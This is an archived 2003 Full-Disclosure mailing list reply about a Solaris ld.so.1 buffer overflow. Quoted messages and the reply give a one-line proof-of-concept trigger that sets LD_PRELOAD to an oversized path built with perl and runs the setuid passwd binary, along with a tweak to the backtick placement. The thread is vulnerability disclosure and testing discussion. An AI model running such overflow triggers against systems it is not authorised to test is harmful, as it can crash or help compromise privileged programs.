lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <871080DEC5874D41B4E3AFC5C400611E03F60683@UTDEVS02.campus.ad.utdallas.edu> From: pauls at utdallas.edu (Schmehl, Paul L) Subject: Re: Fwd: Re: Solaris ld.so.1 buffer overflow > -----Original Message----- > From: Jim Dew [mailto:jdew@...drasil.ca] > Sent: Wednesday, July 30, 2003 8:19 PM > To: Jouko Pynnonen > Cc: full-disclosure@...ts.netsys.com > Subject: [Full-Disclosure] Re: Fwd: Re: Solaris ld.so.1 > buffer overflow > > > On Wed, Jul 30, 2003 at 07:49:28PM +0300, Jouko Pynnonen wrote: > > > > On Wed, Jul 30, 2003 at 12:37:44PM -0400, Rukshin, David wrote: > > > Modify the command (you need to add a trailing slash) to be the > > > following: > > > > > > LD_PRELOAD=/`perl -e 'print "A"x2000'`/ passwd > > > > > > and try it again. > > > > this segfaults on solaris 2.6 > Try moving the escape to *before* the backtick: LD_PRELOAD=/`perl -e 'print "A"x2000'/` passwd Paul Schmehl (pauls@...allas.edu) Adjunct Information Security Officer The University of Texas at Dallas AVIEN Founding Member http://www.utdallas.edu/~pauls/
Powered by blists - more mailing lists